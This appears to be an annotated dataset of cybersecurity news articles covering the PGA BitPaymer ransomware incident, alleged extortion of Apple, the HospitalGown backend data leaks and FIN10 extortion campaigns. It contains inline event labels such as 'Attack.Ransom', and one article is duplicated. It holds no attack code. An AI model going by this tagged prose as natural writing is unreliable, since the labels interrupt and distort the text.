PGA of America computers were infected this week with a strain of malicious software that locked down critical files and demanded Attack.Ransom cryptocurrency for their return . Officials discovered on Tuesday that servers had been targeted in a ransomware attack Attack.Ransom that blocked them from obtaining access to material relating to major golf tournaments , including this week ’ s PGA Championship at Bellerive Country Club . Some signage had been in development for over a year and could not be reproduced quickly , Golfweek reported . The extortion threat Attack.Ransom was clear : Transfer bitcoin to the hackers or lose the files forever . “ Your network has been penetrated . All files on each host in the network have been encrypted with a strong algorythm ( sic ) , ” a ransom read . “ Backups were either encrypted or deleted or backup disks were formatted. ” The note claimed shutting down the system may damage files . The notice included a bitcoin wallet number—where funds could be sent—and a warning that there was no way to get access to the files without a decryption key . The hackers that said they would prove their “ honest intentions ” to the PGA of America by unlocking two files free-of-charge . A source who asked not to be named told Golfweek that officials had no intention of paying the ransom demand Attack.Ransom —following the advice of most law enforcement officials and cybersecurity experts . The network remained locked on Wednesday and external researchers are still investigating . PGA of America has declined to comment . The golfing association did not reveal what ransomware infected its computers . But tech website Bleeping Computer found the demand matched the BitPaymer variant . Researcher Lawrence Abrams said one previous extortion Attack.Ransom scheme asked for Attack.Ransom 53 bitcoins , equivalent to $ 335,000 . Abrams described BitPaymer as a “ secure ransomware ” and said the PGA would either have to rely on backups to regain access to its files or pay Attack.Ransom the significant bitcoin demand Attack.Ransom .

A group of hackers are allegedly threatening to remotely wipe millions of iPhones and iCloud accounts , unless Apple agrees to pay a ransom Attack.Ransom by April 7th . As Motherboard reports , the hackers – who are calling themselves the “ Turkish Crime Family ” – are demanding Attack.Ransom Apple pay a ransom Attack.Ransom of $ 75,000 ( in either the Bitcoin or Ethereum cryptocurrencies ) , or hand over $ 100,000 worth of iTunes gift cards . Motherboard ‘ s Joseph Cox reports that one of the hackers shared screenshots of emails that had allegedly been exchanged with Apple , including one where a member of Apple ’ s security team asked if the group would be willing to share a sample of the stolen data . If emails shared by the hackers are legitimate , then it appears that Apple ’ s security team also requested that a YouTube video be removed of an unnamed member of the gang using stolen credentials to access an elderly woman ’ s iCloud account and view photos that had previously been backed up online . The alleged emails from Apple go on to underline that the technology firm will “ not reward cyber criminals for breaking the law ” . What we don ’ t know is whether the email exchanges between the hackers and Apple are real or faked , and – indeed – whether the so-called “ Turkish Crime Gang ” really has access Attack.Databreach to a large number of Apple users ’ credentials . Other than the video of the elderly woman ’ s iCloud account being broken into , there has been no evidence shared with the media to suggest that the hackers ’ claims of having gained access Attack.Databreach to a large database of Apple usernames and passwords are legitimate . However , if it ’ s true that the hackers are attempting to engage with the media in an attempt to increase their chances of a substantial payout then that would be in line with an increasingly common technique deployed by extortionists . For instance , we have discussed before how an individual hacker or hacking group known as The Dark Overlord has targeted investment banks – stealing internal documents and bringing them to the public ’ s attention in an attempt to extort more money Attack.Ransom . In another extortion Attack.Ransom attempt , The Dark Overlord stole Attack.Databreach hundreds of gigabytes of files from the Gorilla Glue adhesive company , and attempted to increase their chances of crowbarring more money out of corporate victims by sharing details with security industry media . For the record , when The Dark Overlord contacted me to help them blackmail Attack.Ransom companies , I declined . I believe that companies should do everything in their power to protect their customers and prevent criminals from profiting from extortion Attack.Ransom . We simply don ’ t know the truth of the Turkish Crime Family ’ s claims , and whether Apple users are at risk . But I do hope that the media stories will help remind Apple users of the importance of using a strong , unique password to secure their account and enable two-factor authentication to make their accounts harder to break into .

A group of hackers are allegedly threatening to remotely wipe millions of iPhones and iCloud accounts , unless Apple agrees to pay a ransom Attack.Ransom by April 7th . As Motherboard reports , the hackers – who are calling themselves the “ Turkish Crime Family ” – are demanding Attack.Ransom Apple pay a ransom Attack.Ransom of $ 75,000 ( in either the Bitcoin or Ethereum cryptocurrencies ) , or hand over $ 100,000 worth of iTunes gift cards . Motherboard ‘ s Joseph Cox reports that one of the hackers shared screenshots of emails that had allegedly been exchanged with Apple , including one where a member of Apple ’ s security team asked if the group would be willing to share a sample of the stolen data . If emails shared by the hackers are legitimate , then it appears that Apple ’ s security team also requested that a YouTube video be removed of an unnamed member of the gang using stolen credentials to access an elderly woman ’ s iCloud account and view photos that had previously been backed up online . The alleged emails from Apple go on to underline that the technology firm will “ not reward cyber criminals for breaking the law ” . What we don ’ t know is whether the email exchanges between the hackers and Apple are real or faked , and – indeed – whether the so-called “ Turkish Crime Gang ” really has access Attack.Databreach to a large number of Apple users ’ credentials . Other than the video of the elderly woman ’ s iCloud account being broken into , there has been no evidence shared with the media to suggest that the hackers ’ claims of having gained access Attack.Databreach to a large database of Apple usernames and passwords are legitimate . However , if it ’ s true that the hackers are attempting to engage with the media in an attempt to increase their chances of a substantial payout then that would be in line with an increasingly common technique deployed by extortionists . For instance , we have discussed before how an individual hacker or hacking group known as The Dark Overlord has targeted investment banks – stealing internal documents and bringing them to the public ’ s attention in an attempt to extort more money Attack.Ransom . In another extortion Attack.Ransom attempt , The Dark Overlord stole Attack.Databreach hundreds of gigabytes of files from the Gorilla Glue adhesive company , and attempted to increase their chances of crowbarring more money out of corporate victims by sharing details with security industry media . For the record , when The Dark Overlord contacted me to help them blackmail Attack.Ransom companies , I declined . I believe that companies should do everything in their power to protect their customers and prevent criminals from profiting from extortion Attack.Ransom . We simply don ’ t know the truth of the Turkish Crime Family ’ s claims , and whether Apple users are at risk . But I do hope that the media stories will help remind Apple users of the importance of using a strong , unique password to secure their account and enable two-factor authentication to make their accounts harder to break into .

Insecure backend databases and mobile apps are making for a dangerous combination , exposing Attack.Databreach an estimated 280 million records that include a treasure-trove of private user data . According to a report by Appthority , more than 1,000 apps it looked at on mobile devices leaked Attack.Databreach personally identifiable information that included passwords , location , VPN PINs , emails and phone numbers . Appthority Mobile Threat Team called Vulnerability-related.DiscoverVulnerability the vulnerability HospitalGown and said Vulnerability-related.DiscoverVulnerability the culprit behind the threat are misconfigured backend storage platforms including Elasticsearch , Redis , MongoDB and MySQL . “ HospitalGown is a vulnerability to data exposure caused , not by any code in the app , but by the app developers ’ failure to properly secure the backend servers with which the app communicates , ” wrote the authors of the report released Vulnerability-related.DiscoverVulnerability Wednesday . According to Seth Hardy , director of security research , the problem is a byproduct of insecure database instillations that made headlines Vulnerability-related.DiscoverVulnerability in February . That ’ s when misconfigured and insecure MongoDB , Hadoop and CouchDB installations became popular extortion Attack.Ransom targets for hackers who were scanning for vulnerable servers to attack . The weak link in the chain when it comes to HospitalGown are the insecure servers that apps connect to , Hardy said . During the course of Appthority ’ s investigation , it found Vulnerability-related.DiscoverVulnerability 21,000 open Elasticsearch servers , revealing more than 43 terabytes of exposed data . In one scenario , the attacker looks for vulnerabilities in the space between the vendor ’ s mobile application and the app ’ s server side components , according to researchers . “ The servers for most mobile applications are cloud based and accessible via the Internet , this allows a bad actor to skip the long and potentially many-layered ‘ compromise ’ stage of an attack , accessing Attack.Databreach company data directly from a database that is impossible for the enterprise to see or secure , ” they wrote . Researchers said Vulnerability-related.DiscoverVulnerability vulnerable mobile apps it found Vulnerability-related.DiscoverVulnerability ran the gamut , from office productivity , enterprise access management , games , dating to travel , flight and hotel applications . Any personal identifiable data a user shared with the app was vulnerable Vulnerability-related.DiscoverVulnerability to possible exfiltration Attack.Databreach by a hacker . “ These servers were accessible from the Internet , lacked any means of authentication to prevent unwanted access Attack.Databreach to the data they contained , and failed to secure transport of data , including PII , using HTTPS : conventions , ” according to the report . While this is a strictly a data security issue , Appthority said Vulnerability-related.DiscoverVulnerability , attacks can quickly escalate and personal information could easily be leveraged in a spear phishing attack Attack.Phishing or brute force attack . In its report , AppThority showed how a mobile VPN app called Pulse Workspace , used by enterprises , government agencies and service providers , leaked Attack.Databreach data . While Pulse Workspace created an API to secure front-end Elasticsearch access , the backend , and all of the app ’ s data records , were exposed and leaked Attack.Databreach Pulse customer data . AppThority notified Vulnerability-related.DiscoverVulnerability Pulse Workspace and its customers of the vulnerability , which have since been fixed Vulnerability-related.PatchVulnerability . Appthority is careful to point out that of the platforms it examined – Elasticsearch , Redis , MongoDB , and MySQL – each had plugins to allow for proper public exposure on the internet . “ Best practices on secure data stores is just not being adopted in too many cases , ” Hardy said . Elasticsearch , for example , has a bevy of security and data protection capabilities , such as being able to encrypt all the data that ’ s on the platform . Increasing the risk of HospitalGown type-attacks is that fact that many apps Appthority looked at seemed benign in terms of shared user data . But , increasingly apps have advertising components that collect Attack.Databreach personal identifiable data that can be mined by hackers for phishing Attack.Phishing or ransomware attacks Attack.Ransom . App developers and system administrators need to know where their data is stored and make sure it is secured , Hardy told Threatpost .

A group of financially motivated hackers is targeting networks and systems of North American companies , threatening to leak the stolen information and cripple the company by disrupting their networks if they don ’ t pay a hefty ransom Attack.Ransom . The group , dubbed FIN10 by FireEye researchers , first gets access to the target companies ’ systems through spear-phishing Attack.Phishing ( and possibly other means ) , then uses publicly available software , scripts and techniques to gain a foothold into victims ’ networks . They use Meterpreter or the SplinterRAT to establish the initial foothold within victim environments ( and later a permanent backdoor ) , then custom PowerShell-based utilities , the pen-testing tool PowerShell Empire , and scheduled tasks to achieve persistence . “ We have also observed FIN10 using PowerShell to load Metasploit Meterpreter stagers into memory , ” the researchers noted . The group leverages Windows Remote Desktop Protocol ( RDP ) and single-factor protected VPN to access various systems within the environment . Finally , they deploy destructive batch scripts intended to delete critical system files and shutdown network systems , in order to disrupt the normal operations of those systems . “ In all but one targeted intrusion we have attributed to FIN10 , the attacker ( s ) demanded Attack.Ransom a variable sum payable in Bitcoin for the non-release of sensitive data obtained during network reconnaissance stages , ” the researchers say . They requested sum varies between 100 to 500 Bitcoin . If the ransom isn’t paid Attack.Ransom , they publish the stolen data on Pastebin-type sites . The researchers do not mention if any of the companies refused to pay Attack.Ransom and ended up having their systems and networks disrupted . For the time being , the group seems to have concentrated on hitting companies in North America , predominately in Canada . They ’ ve also concentrated on two types of businesses : mining companies and casinos . Still , it ’ s possible that they ’ ve targeted companies in other industries , or will do so in the future . FIN10 sends the extortion emails to staff and board members of the victim organizations , and are also known to contact bloggers and local journalists to inform them about the breach , likely in an attempt to pressure affected organizations into paying the ransom Attack.Ransom . Finally , even though they sign their emails with monikers used by Russian and Serbian hackers ( “ Angels_Of_Truth , ” “ Tesla Team , ” Anonymous Threat Agent ” ) , the quality of the group ’ s English , the low quality of their Russian , and inconsistencies in tradecraft all point away from these particular individuals or groups . “ Emphasis in regional targeting of North American-based organizations could possibly suggest the attacker ( s ) familiarity with the region , ” the researchers noted . They also point out that the “ relative degree of operational success enjoyed by FIN10 makes it highly probable the group will continue to conduct similar extortion Attack.Ransom - based campaigns at least in the near term. ” Companies that have been received a similar ransom demand Attack.Ransom are advised to move fast to confirm that the breach has actually happened , to determine the scope of the breach , to contain the attack , to boot the attackers from their networks , and make sure they can ’ t come back . Those last two steps are , perhaps , better done after the company definitely decides that they are ready to deal with the consequences of the attackers ’ anger . Calling in law enforcement and legal counsel for advice on what to do is also a good idea . “ Understand that paying the ransom Attack.Ransom may be the right option , but there are no guarantees the attacker ( s ) won ’ t come back for more money or simply leak the data anyway . Include experts in the decision-making process and understand the risks associated with all options , ” the researchers advise . Companies that have yet to be targeted by these or other hackers would do well to improve their security posture , but also to prepare for data breaches Attack.Databreach by tightening access to their backup environment , and knowing exactly who will be called in to help in case of a breach Attack.Databreach .

FireEye has identified a set of financially motivated intrusion operations being carried out by a threat actor we have dubbed FIN10 . FIN10 is known for compromising Attack.Databreach networks , stealing Attack.Databreach sensitive data , and directly engaging victim executives and board members in an attempt to extort Attack.Ransom them into paying Attack.Ransom between 100 and 500 bitcoins ( valued at between $ 125,000 and $ 620,000 as of mid April 2017 ) . For some victims that did not give into the demand Attack.Ransom , FIN10 escalated their operation and destroyed critical production systems and leaked Attack.Databreach stolen data to journalists in an attempt to increase visibility of the compromise and coerce victims into paying up Attack.Ransom . The first known FIN10 operation was in 2013 and their operations have continued until at least 2016 . To date , we are primarily aware of Canadian victims – specifically casinos and mining organizations . Given the release of sensitive victim data , extortion Attack.Ransom , and destruction of systems , FireEye considers FIN10 to be one of the most disruptive threat actors observed in the region so far .